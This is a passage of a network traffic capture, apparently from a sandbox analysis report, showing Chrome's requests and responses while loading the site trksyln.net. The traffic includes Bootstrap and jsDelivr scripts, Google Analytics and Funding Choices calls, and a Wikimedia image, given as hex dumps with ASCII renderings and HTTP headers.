2024-10-31 18:19:26 UTC	1378	IN	Data Raw: 2e 6c 65 6e 67 74 68 29 2c 65 5b 6e 5d 3d 7a 28 74 2e 64 61 74 61 73 65 74 5b 69 5d 29 7d 29 2c 65 7d 2c 67 65 74 44 61 74 61 41 74 74 72 69 62 75 74 65 3a 28 74 2c 65 29 3d 3e 7a 28 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 62 73 2d 22 2b 24 28 65 29 29 29 2c 6f 66 66 73 65 74 28 74 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 72 65 74 75 72 6e 7b 74 6f 70 3a 65 2e 74 6f 70 2b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 54 6f 70 2c 6c 65 66 74 3a 65 2e 6c 65 66 74 2b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 4c 65 66 74 7d 7d 2c 70 6f 73 69 74 69 6f 6e 3a 74 3d 3e 28 7b 74 6f 70 3a 74 2e 6f 66 66 73 65 74 54 6f 70 2c 6c 65 66 74 3a 74 2e Data Ascii: .length),e[n]=z(t.dataset[i])}),e},getDataAttribute:(t,e)=>z(t.getAttribute("data-bs-"+$(e))),offset(t){const e=t.getBoundingClientRect();return{top:e.top+document.body.scrollTop,left:e.left+document.body.scrollLeft}},position:t=>({top:t.offsetTop,left:t.
2024-10-31 18:19:26 UTC	1378	IN	Data Raw: 74 7c 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 31 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 26 26 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 75 70 64 61 74 65 49 6e 74 65 72 76 61 6c 28 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 Data Ascii: t\|\|(this._isPaused=!1),this._interval&&(clearInterval(this._interval),this._interval=null),this._config&&this._config.interval&&!this._isPaused&&(this._updateInterval(),this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).b
2024-10-31 18:19:26 UTC	1378	IN	Data Raw: 58 29 3a 74 68 69 73 2e 74 6f 75 63 68 53 74 61 72 74 58 3d 74 2e 63 6c 69 65 6e 74 58 7d 2c 69 3d 74 3d 3e 7b 74 68 69 73 2e 74 6f 75 63 68 44 65 6c 74 61 58 3d 74 2e 74 6f 75 63 68 65 73 26 26 74 2e 74 6f 75 63 68 65 73 2e 6c 65 6e 67 74 68 3e 31 3f 30 3a 74 2e 74 6f 75 63 68 65 73 5b 30 5d 2e 63 6c 69 65 6e 74 58 2d 74 68 69 73 2e 74 6f 75 63 68 53 74 61 72 74 58 7d 2c 6e 3d 74 3d 3e 7b 21 74 68 69 73 2e 5f 70 6f 69 6e 74 65 72 45 76 65 6e 74 7c 7c 22 70 65 6e 22 21 3d 3d 74 2e 70 6f 69 6e 74 65 72 54 79 70 65 26 26 22 74 6f 75 63 68 22 21 3d 3d 74 2e 70 6f 69 6e 74 65 72 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 6f 75 63 68 44 65 6c 74 61 58 3d 74 2e 63 6c 69 65 6e 74 58 2d 74 68 69 73 2e 74 6f 75 63 68 53 74 61 72 74 58 29 2c 74 68 69 73 2e 5f 68 61 6e Data Ascii: X):this.touchStartX=t.clientX},i=t=>{this.touchDeltaX=t.touches&&t.touches.length>1?0:t.touches[0].clientX-this.touchStartX},n=t=>{!this._pointerEvent\|\|"pen"!==t.pointerType&&"touch"!==t.pointerType\|\|(this.touchDeltaX=t.clientX-this.touchStartX),this._han

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49778	151.101.193.229	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:26 UTC	559	OUT	GET /npm/bootstrap-affix@1.0.1/assets/js/affix.min.js HTTP/1.1 Host: cdn.jsdelivr.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:26 UTC	773	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2754 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: * Timing-Allow-Origin: * Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable Cross-Origin-Resource-Policy: cross-origin X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Type: application/javascript; charset=utf-8 X-JSD-Version: 1.0.1 X-JSD-Version-Type: version ETag: W/"ac2-OwtoaIo59xCfoKcJqLdO5pCpf00" Accept-Ranges: bytes Age: 658736 Date: Thu, 31 Oct 2024 18:19:26 GMT X-Served-By: cache-fra-eddf8230032-FRA, cache-dfw-kdal2120025-DFW X-Cache: MISS, HIT Vary: Accept-Encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-10-31 18:19:26 UTC	1378	IN	Data Raw: 2f 2a 2a 0a 20 2a 20 4d 69 6e 69 66 69 65 64 20 62 79 20 6a 73 44 65 6c 69 76 72 20 75 73 69 6e 67 20 54 65 72 73 65 72 20 76 35 2e 31 39 2e 32 2e 0a 20 2a 20 4f 72 69 67 69 6e 61 6c 20 66 69 6c 65 3a 20 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 61 66 66 69 78 40 31 2e 30 2e 31 2f 61 73 73 65 74 73 2f 6a 73 2f 61 66 66 69 78 2e 6a 73 0a 20 2a 0a 20 2a 20 44 6f 20 4e 4f 54 20 75 73 65 20 53 52 49 20 77 69 74 68 20 64 79 6e 61 6d 69 63 61 6c 6c 79 20 67 65 6e 65 72 61 74 65 64 20 66 69 6c 65 73 21 20 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 73 64 65 6c 69 76 72 2e 63 6f 6d 2f 75 73 69 6e 67 2d 73 72 69 2d 77 69 74 68 2d 64 79 6e 61 6d 69 63 2d 66 69 6c 65 73 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 Data Ascii: /** * Minified by jsDelivr using Terser v5.19.2. * Original file: /npm/bootstrap-affix@1.0.1/assets/js/affix.js * * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files */!function(
2024-10-31 18:19:26 UTC	1376	IN	Data Raw: 73 2e 24 74 61 72 67 65 74 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 65 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 6f 66 66 73 65 74 28 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 69 6e 6e 65 64 4f 66 66 73 65 74 3d 65 2e 74 6f 70 2d 74 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 63 68 65 63 6b 50 6f 73 69 74 69 6f 6e 57 69 74 68 45 76 65 6e 74 4c 6f 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 74 2e 70 72 6f 78 79 28 74 68 69 73 2e 63 68 65 63 6b 50 6f 73 69 74 69 6f 6e 2c 74 68 69 73 29 2c 31 29 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 63 68 65 63 6b 50 6f 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 29 7b 76 61 72 20 65 3d Data Ascii: s.$target.scrollTop(),e=this.$element.offset();return this.pinnedOffset=e.top-t},i.prototype.checkPositionWithEventLoop=function(){setTimeout(t.proxy(this.checkPosition,this),1)},i.prototype.checkPosition=function(){if(this.$element.is(":visible")){var e=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49781	64.233.167.156	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:26 UTC	887	OUT	POST /g/collect?v=2&tid=G-JH2MNQ1WXY&cid=1627253267.1730398763&gtm=45je4au0v9106823843za200&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=101533422~101823848~101878899~101878944~101925629 HTTP/1.1 Host: stats.g.doubleclick.net Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://trksyln.net X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: test_cookie=CheckForPermission
2024-10-31 18:19:26 UTC	842	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: https://trksyln.net Date: Thu, 31 Oct 2024 18:19:26 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Access-Control-Allow-Credentials: true Content-Type: text/plain Cross-Origin-Resource-Policy: cross-origin Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:111:0 Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:111:0"}],} Server: Golfe2 Content-Length: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49782	185.15.59.240	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:26 UTC	662	OUT	GET /wikipedia/commons/thumb/7/7d/Microsoft_.NET_logo.svg/1200px-Microsoft_.NET_logo.svg.png HTTP/1.1 Host: upload.wikimedia.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:26 UTC	1068	IN	HTTP/1.1 200 OK date: Thu, 31 Oct 2024 11:48:50 GMT etag: e78b7bd4e07bfd2389ecb0c9baf2d9c4 server: ATS/9.2.5 content-type: image/png content-disposition: inline;filename=UTF-8''Microsoft_.NET_logo.svg.png last-modified: Thu, 11 Jul 2024 08:02:42 GMT content-length: 6633 age: 23436 x-cache: cp3077 hit, cp3077 hit/50 x-cache-status: hit-front server-timing: cache;desc="hit-front", host;desc="cp3077" strict-transport-security: max-age=106384710; includeSubDomains; preload report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] } nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0} x-client-ip: 173.254.250.77 x-content-type-options: nosniff access-control-allow-origin: access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache timing-allow-origin: * accept-ranges: bytes connection: close
2024-10-31 18:19:26 UTC	6633	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 b0 08 03 00 00 00 dc ff 43 fd 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 02 df 50 4c 54 45 51 2b d4 e8 e4 f9 ff ff ff fe fd ff 78 5a de a8 95 ea 5d 3a d7 63 41 d8 d1 c6 f4 8c 72 e2 e0 d9 f7 54 2f d5 a0 8b e8 f8 f7 fd 68 47 da ce c3 f3 ef eb fb 5d 39 d7 b8 a9 ed 79 5c de e1 da f8 a4 90 e8 f9 f8 fd 69 48 da d3 c9 f4 52 2c d4 8f 77 e3 f1 ee fc 5f 3c d7 bb ad ee fe fe ff 7e 62 df e5 df f9 56 32 d5 a7 94 e9 fa f9 fe 6d 4d db d4 cb f4 93 7b e4 f2 ef fc 60 3d d8 bf b1 ef 7f 64 df e6 e0 f9 aa 98 ea fb fa fe 6e 4e db d6 cd f5 96 7f e5 f5 f3 fc c2 b5 f0 84 Data Ascii: PNGIHDRCgAMAa cHRMz&u0`:pQ<PLTEQ+xZ]:cArT/hG]9y\iHR,w_<~bV2mM{`=dnN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49783	142.250.185.142	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:26 UTC	653	OUT	GET /i/pub-9495854422341365?ers=1 HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:26 UTC	1937	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Timing-Allow-Origin: * Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:26 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-QKZNR-ywaWWGPt-TR3UA2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: cross-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmJw15BikPj6kkkLiJ3SZ7CGAHHrzXOs04E46d951hIgdte6yOoPxIYKl1idgdix6BKrJxCr9lxiNQfi--susT4H4iKJK6wtQHy76QrrYyBm-HqFlQOIhXg41k3p38kmsKHzwWdGJY2k_ML45Py8kqLMpNKS_KK05LTU4tSistSieCMDIxNDA2MDPQOD-AIDAIICP-o" Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-31 18:19:26 UTC	1937	IN	Data Raw: 36 65 64 65 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 7c 7c 20 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 5f 46 5f 74 6f 67 Data Ascii: 6edeif (typeof __googlefc === 'undefined' \|\| typeof __googlefc.fcKernelManager === 'undefined') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs\|\|{};(function(_){var window=this;try{_._F_tog
2024-10-31 18:19:26 UTC	1937	IN	Data Raw: 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 61 28 62 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 29 3b 66 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 71 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 Data Ascii: :function(){return fa(ba(this))}})}return a});fa=function(a){a={next:a};a[Symbol.iterator]=function(){return this};return a};_.q=function(a){var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="
2024-10-31 18:19:26 UTC	1937	IN	Data Raw: 67 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 74 68 69 73 2e 68 61 28 67 29 3b 65 6c 73 65 7b 61 3a 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 67 29 7b 63 61 73 65 20 22 6f 62 6a 65 63 74 22 3a 76 61 72 20 68 3d 67 21 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 3b 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 68 3d 21 30 3b 62 72 65 61 6b 20 61 3b 64 65 66 61 75 6c 74 3a 68 3d 21 31 7d 68 3f 74 68 69 73 2e 4b 28 67 29 3a 74 68 69 73 2e 41 28 67 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 4b 3d 0a 66 75 6e 63 74 69 6f 6e 28 67 29 7b 76 61 72 20 68 3d 76 6f 69 64 20 30 3b 74 72 79 7b 68 3d 67 2e 74 68 65 6e 7d 63 61 74 63 68 28 6b 29 7b 74 68 69 73 2e 75 28 6b 29 3b 72 65 74 75 72 6e 7d 74 79 70 65 6f 66 20 68 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 74 68 69 Data Ascii: g instanceof e)this.ha(g);else{a:switch(typeof g){case "object":var h=g!=null;break a;case "function":h=!0;break a;default:h=!1}h?this.K(g):this.A(g)}};e.prototype.K=function(g){var h=void 0;try{h=g.then}catch(k){this.u(k);return}typeof h=="function"?thi
2024-10-31 18:19:26 UTC	1937	IN	Data Raw: 71 28 67 29 2c 6b 3d 68 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 6b 2e 64 6f 6e 65 3f 63 28 5b 5d 29 3a 6e 65 77 20 65 28 66 75 6e 63 74 69 6f 6e 28 6d 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 77 28 78 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 44 29 7b 41 5b 78 5d 3d 44 3b 42 2d 2d 3b 42 3d 3d 30 26 26 6d 28 41 29 7d 7d 76 61 72 20 41 3d 5b 5d 2c 42 3d 30 3b 64 6f 20 41 2e 70 75 73 68 28 76 6f 69 64 20 30 29 2c 42 2b 2b 2c 63 28 6b 2e 76 61 6c 75 65 29 2e 6d 62 28 77 28 41 2e 6c 65 6e 67 74 68 2d 31 29 2c 6e 29 2c 6b 3d 68 2e 6e 65 78 74 28 29 3b 77 68 69 6c 65 28 21 6b 2e 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 0a 76 61 72 20 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 Data Ascii: q(g),k=h.next();return k.done?c([]):new e(function(m,n){function w(x){return function(D){A[x]=D;B--;B==0&&m(A)}}var A=[],B=0;do A.push(void 0),B++,c(k.value).mb(w(A.length-1),n),k=h.next();while(!k.done)})};return e});var ra=function(a,b,c){if(a==null)th
2024-10-31 18:19:26 UTC	1937	IN	Data Raw: 75 72 6e 20 68 7d 29 3b 0a 70 28 22 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 68 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6b 3d 6e 65 77 20 61 28 5f 2e 71 28 5b 5b 68 2c 22 73 22 5d 5d 29 29 3b 69 66 28 6b 2e 67 65 74 28 68 29 21 3d 22 73 22 7c 7c 6b 2e 73 69 7a 65 21 3d 31 7c 7c 6b 2e 67 65 74 28 7b 78 3a 34 7d 29 7c 7c 6b 2e 73 65 74 28 7b 78 3a 34 7d 2c 22 74 22 29 21 3d 6b 7c 7c 6b 2e 73 69 Data Ascii: urn h});p("Map",function(a){if(function(){if(!a\|\|typeof a!="function"\|\|!a.prototype.entries\|\|typeof Object.seal!="function")return!1;try{var h=Object.seal({x:4}),k=new a(_.q([[h,"s"]]));if(k.get(h)!="s"\|\|k.size!=1\|\|k.get({x:4})\|\|k.set({x:4},"t")!=k\|\|k.si
2024-10-31 18:19:26 UTC	1937	IN	Data Raw: 61 72 20 6d 3d 68 5b 31 5d 3b 72 65 74 75 72 6e 20 66 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6d 29 7b 66 6f 72 28 3b 6d 2e 68 65 61 64 21 3d 68 5b 31 5d 3b 29 6d 3d 6d 2e 71 61 3b 66 6f 72 28 3b 6d 2e 6e 65 78 74 21 3d 6d 2e 68 65 61 64 3b 29 72 65 74 75 72 6e 20 6d 3d 0a 6d 2e 6e 65 78 74 2c 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 6b 28 6d 29 7d 3b 6d 3d 6e 75 6c 6c 7d 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 29 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 7b 7d 3b 72 65 74 75 72 6e 20 68 2e 71 61 3d 68 2e 6e 65 78 74 3d 68 2e 68 65 61 64 3d 68 7d 2c 67 3d 30 3b 72 65 74 75 72 6e 20 63 7d 29 3b 0a 70 28 22 53 65 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63 Data Ascii: ar m=h[1];return fa(function(){if(m){for(;m.head!=h[1];)m=m.qa;for(;m.next!=m.head;)return m=m.next,{done:!1,value:k(m)};m=null}return{done:!0,value:void 0}})},f=function(){var h={};return h.qa=h.next=h.head=h},g=0;return c});p("Set",function(a){if(func
2024-10-31 18:19:26 UTC	1937	IN	Data Raw: 2c 63 7c 7c 30 29 21 3d 3d 2d 31 7d 7d 29 3b 0a 70 28 22 41 72 72 61 79 2e 66 72 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 3d 63 21 3d 6e 75 6c 6c 3f 63 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 7d 3b 76 61 72 20 65 3d 5b 5d 2c 66 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 74 79 70 65 6f 66 20 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 62 3d 66 2e 63 61 6c 6c 28 62 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 21 28 66 3d 62 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 65 2e 70 75 73 68 28 Data Ascii: ,c\|\|0)!==-1}});p("Array.from",function(a){return a?a:function(b,c,d){c=c!=null?c:function(h){return h};var e=[],f=typeof Symbol!="undefined"&&Symbol.iterator&&b[Symbol.iterator];if(typeof f=="function"){b=f.call(b);for(var g=0;!(f=b.next()).done;)e.push(
